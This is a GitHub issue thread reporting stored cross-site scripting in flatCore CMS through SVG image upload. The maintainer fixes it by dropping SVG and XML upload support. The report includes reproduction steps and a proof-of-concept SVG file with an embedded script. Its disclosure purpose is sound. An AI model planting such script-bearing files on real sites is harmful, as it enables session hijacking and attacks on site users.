Skip to content
This repository has been archived by the owner on Jan 5, 2023. It is now read-only.

Cross Site Scripting (XSS) #53

Closed
tranquac opened this issue Aug 13, 2021 · 6 comments
Closed

Cross Site Scripting (XSS) #53

tranquac opened this issue Aug 13, 2021 · 6 comments

Comments

@tranquac
Copy link

Describe the bug
Cross Site Scripting (XSS) via upload image function

To Reproduce
Steps to reproduce the behavior:

  1. Login to flatcore CMS
  2. Click on 'Upload file'
  3. Drop svg file contains XSS payload , example filename : xss.svg
  4. and XSS in url : http://domain/content/images/payload1.svg

Screenshots
https://raw.githubusercontent.com/tranquac/POC/main/xss_flatcoreCMS.PNG

xss.svg

<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
   <rect width="300" height="100" style="fill:rgb(0,0,255);stroke-width:3;stroke:rgb(0,0,0)" />
   <script type="text/javascript">
      alert("XSS in flatCore CMS");
   </script>
</svg>

Desktop (please complete the following information):

  • OS: All
  • Browser : All
  • Version : Last version

Additional context
XSS attacks occur when an attacker uses a web application to send malicious code, generally in the form of a browser side script, to a different end user

@tranquac
Copy link
Author

@patkon
Can you help me check issue this?
Looking forward to hearing from you.
Thank.

@patkon
Copy link
Member

patkon commented Aug 16, 2021

I think the best solution will be to remove SVG support from the core. Maybe I will write an addon to enable secure SVG upload later.

@tranquac
Copy link
Author

yes. That is the good idea for this issue!

patkon added a commit that referenced this issue Aug 18, 2021
These file types must be sanatized before uploading.
#53
@nu11secur1ty
Copy link

nu11secur1ty commented Aug 26, 2021

Hello friends, the problem is still there and still critical!

Proof SXX Stored:

Proof=PHPSSESID:

No matter what account the user using, this is a broken infrastructure, logic, and architecture!

Please fix this problem and be more focused and responsible!

BR @nu11secur1ty System Administrator - Infrastructure and Penetration testing Engineer.

@patkon
Copy link
Member

patkon commented Aug 26, 2021

Thank you for reporting. I've just released Version 2.0.8. From this version on there is no more SVG and XML upload.

@nu11secur1ty
Copy link

Ok, thank you. 😘🙂

@patkon patkon closed this as completed Jan 5, 2023
Sign up for free to subscribe to this conversation on GitHub. Already have an account? Sign in.
Labels
None yet
Projects
None yet
Development

No branches or pull requests

3 participants